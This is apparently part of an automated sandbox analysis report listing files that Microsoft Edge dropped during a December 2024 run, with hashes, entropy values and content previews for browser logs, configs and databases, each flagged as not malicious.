                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):311
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.116705216663284
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L7D1923oH+Tcwtk2WwnvB2KLlpLYLZq2P923oH+Tcwtk2WwnvIFUv:7PmYebkxwnvFLTKZv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                              MD5:A90B3E04A373B6BF41EE7A5503E591DC
                                                                                                                                                                                                                                                                                              SHA1:004435CE6513339EEB2F8A40DA372901C2464DBA
                                                                                                                                                                                                                                                                                              SHA-256:27A9EFD29C8C2A1DE09F112DA8552E6742995AF32D0DCE218DC35D665A6BC180
                                                                                                                                                                                                                                                                                              SHA-512:A93CA9080C7C8EE2BDBB20DAA0CCCA514AFEEA36E18F15B038BB7F20D5ABBB9DF4B44AF178AB86791EB458BECFF799CB0DD9BDCF595DE3F42644D3D85A3A626C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:24.973 2120 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/10-12:40:25.190 2120 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):358860
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.324614946413927
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RF:C1gAg1zfvd
                                                                                                                                                                                                                                                                                              MD5:DB305A218A729CA2B1032FD0737EE9E6
                                                                                                                                                                                                                                                                                              SHA1:A1E87704A15E197F95E92349CDE60074244A8859
                                                                                                                                                                                                                                                                                              SHA-256:E0AEF39813315A928AA3791D5C29BEBA049CAAF208334F4CE324019D449F0819
                                                                                                                                                                                                                                                                                              SHA-512:E343688501098FD2BF5BC28F7143FDD34D18CE899847BF6EFD2D08CB32D98B80C5845152AAC2F7A5CB4BD1F7F6B7AE8340171E796D1853D6C17E493C96915CE8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.181159026561858
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86Va+q2P923oH+Tcwt8aPrqIFUt8OL86VHkZmw+OL86VHEVkwO923oH+Tcwt8h:7A0v4YebL3FUt8OAL/+OAB5LYebQJ
                                                                                                                                                                                                                                                                                              MD5:F8E894E914B6D39C6D99AD82CA4F7D74
                                                                                                                                                                                                                                                                                              SHA1:C5064D1317E31E34E78C922C1437C2897231E9F5
                                                                                                                                                                                                                                                                                              SHA-256:F5293EAD2573AE94072190A37A41EBC2F2D087D1E627C00B1E25D4F07C30AECF
                                                                                                                                                                                                                                                                                              SHA-512:9F1F19C8FF5F3E89E797D7837FB972CF8E196122012B308CB3FD0026E1D813802013C56E78A5576B208B55034FED23BBBD2D23FE1CD3DC7B98D593D797B2EE38
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.074 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/10-12:40:19.076 1d58 Recovering log #3.2024/12/10-12:40:19.076 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.181159026561858
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86Va+q2P923oH+Tcwt8aPrqIFUt8OL86VHkZmw+OL86VHEVkwO923oH+Tcwt8h:7A0v4YebL3FUt8OAL/+OAB5LYebQJ
                                                                                                                                                                                                                                                                                              MD5:F8E894E914B6D39C6D99AD82CA4F7D74
                                                                                                                                                                                                                                                                                              SHA1:C5064D1317E31E34E78C922C1437C2897231E9F5
                                                                                                                                                                                                                                                                                              SHA-256:F5293EAD2573AE94072190A37A41EBC2F2D087D1E627C00B1E25D4F07C30AECF
                                                                                                                                                                                                                                                                                              SHA-512:9F1F19C8FF5F3E89E797D7837FB972CF8E196122012B308CB3FD0026E1D813802013C56E78A5576B208B55034FED23BBBD2D23FE1CD3DC7B98D593D797B2EE38
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.074 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/10-12:40:19.076 1d58 Recovering log #3.2024/12/10-12:40:19.076 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13834233536306
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86U+SQL+q2P923oH+Tcwt865IFUt8OL86QG1Zmw+OL86+QQLVkwO923oH+Tcwx:7Aayv4Yeb/WFUt8OAM/+OA7R5LYeb/+e
                                                                                                                                                                                                                                                                                              MD5:966309468774BDA607C319BE82683DDB
                                                                                                                                                                                                                                                                                              SHA1:C1991990981C7892D00766087497034252535AC1
                                                                                                                                                                                                                                                                                              SHA-256:46CBA445504777AB80951AAFDA8792B1B2D8374539B332F504D3D26A27C8484E
                                                                                                                                                                                                                                                                                              SHA-512:B9B2A5B00BB6BFD121F02400B4E4330C67E7C841B73C5C17C86A846A63FCCE9833319C8D8CE85DBD6BF4C8154F18935120B2B7FD8340BE8B863D6CD02B4BE4D4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.127 1d18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/10-12:40:19.136 1d18 Recovering log #3.2024/12/10-12:40:19.142 1d18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13834233536306
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86U+SQL+q2P923oH+Tcwt865IFUt8OL86QG1Zmw+OL86+QQLVkwO923oH+Tcwx:7Aayv4Yeb/WFUt8OAM/+OA7R5LYeb/+e
                                                                                                                                                                                                                                                                                              MD5:966309468774BDA607C319BE82683DDB
                                                                                                                                                                                                                                                                                              SHA1:C1991990981C7892D00766087497034252535AC1
                                                                                                                                                                                                                                                                                              SHA-256:46CBA445504777AB80951AAFDA8792B1B2D8374539B332F504D3D26A27C8484E
                                                                                                                                                                                                                                                                                              SHA-512:B9B2A5B00BB6BFD121F02400B4E4330C67E7C841B73C5C17C86A846A63FCCE9833319C8D8CE85DBD6BF4C8154F18935120B2B7FD8340BE8B863D6CD02B4BE4D4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.127 1d18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/10-12:40:19.136 1d18 Recovering log #3.2024/12/10-12:40:19.142 1d18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1254
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                              MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                              SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                              SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                              SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.103603484490593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LOiQ+q2P923oH+Tcwt8NIFUt8OLOigZmw+OLxQSQVkwO923oH+Tcwt8+eLJ:7q+v4YebpFUt8OqH/+OlQF5LYebqJ
                                                                                                                                                                                                                                                                                              MD5:79061DCF758914E608235896D9C951B3
                                                                                                                                                                                                                                                                                              SHA1:F69F836793E5E8A518C7F9CC8B5204EEA9CB578C
                                                                                                                                                                                                                                                                                              SHA-256:A23A3E379653F0F80945EEE33A4A9806B6E4A67E59CBB3609C85874BE476EEEE
                                                                                                                                                                                                                                                                                              SHA-512:1D6700ABE2BE5C6A37A722F0F075851E5C7651BD828FC0387D75DA97F35EA22AE48B49D042B2B22BF99D467FEE126AD7F22CE3C753636539464CA57E62645FBE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.905 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:40:20.905 1d08 Recovering log #3.2024/12/10-12:40:20.934 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.103603484490593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LOiQ+q2P923oH+Tcwt8NIFUt8OLOigZmw+OLxQSQVkwO923oH+Tcwt8+eLJ:7q+v4YebpFUt8OqH/+OlQF5LYebqJ
                                                                                                                                                                                                                                                                                              MD5:79061DCF758914E608235896D9C951B3
                                                                                                                                                                                                                                                                                              SHA1:F69F836793E5E8A518C7F9CC8B5204EEA9CB578C
                                                                                                                                                                                                                                                                                              SHA-256:A23A3E379653F0F80945EEE33A4A9806B6E4A67E59CBB3609C85874BE476EEEE
                                                                                                                                                                                                                                                                                              SHA-512:1D6700ABE2BE5C6A37A722F0F075851E5C7651BD828FC0387D75DA97F35EA22AE48B49D042B2B22BF99D467FEE126AD7F22CE3C753636539464CA57E62645FBE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.905 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:40:20.905 1d08 Recovering log #3.2024/12/10-12:40:20.934 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):429
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                              MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                              SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                              SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                              SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):155648
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6213202566358492
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:++esIUmufD0/hEWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kEPM1:++es8hH+bDo3iN0Z2TVJkXBBE3ybb1
                                                                                                                                                                                                                                                                                              MD5:54E0F0497BC17057DA9658F0EB9D06CA
                                                                                                                                                                                                                                                                                              SHA1:BFF842C5EA142007C2E862DECA62905AED30A6A9
                                                                                                                                                                                                                                                                                              SHA-256:55E00FFAF504D84D5630ED3422536FDB3FCC35D21882B899176375E888D86255
                                                                                                                                                                                                                                                                                              SHA-512:DE5BBE2056D16BB5C389F32074FAE0E621C5148AF7011056385F857D7EE4C285F54128F15FB1068D8CB7F1A6AE26E01794C1A248A812E96A78701209C37E2548
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8720
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.2182474725517195
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:bl9tFlljq7A/mhWJFuQ3yy7IOWU5b9otdweytllrE9SFcTp4AGbNCV9RUI6:g75fO6td0Xi99pEYQ
                                                                                                                                                                                                                                                                                              MD5:70D0EF1451C294028386CADCD059284A
                                                                                                                                                                                                                                                                                              SHA1:B2BCCF874E9022A0B01D7D0A7CA1D91E3D8A6A3F
                                                                                                                                                                                                                                                                                              SHA-256:DE1BF02BD3E0780DD7555DB95130BCF067809420DEDBB5AB591F3BF267DCF41F
                                                                                                                                                                                                                                                                                              SHA-512:73F7BF4706E52A24A744E1542627FDFDE6328FB068434F2912A1725987871439DFE90A25C1A7E66ABDFF29AEC33EEF8024920E05AA001B7A6BAA140F02222A94
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:............F......&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                              Malicious:false
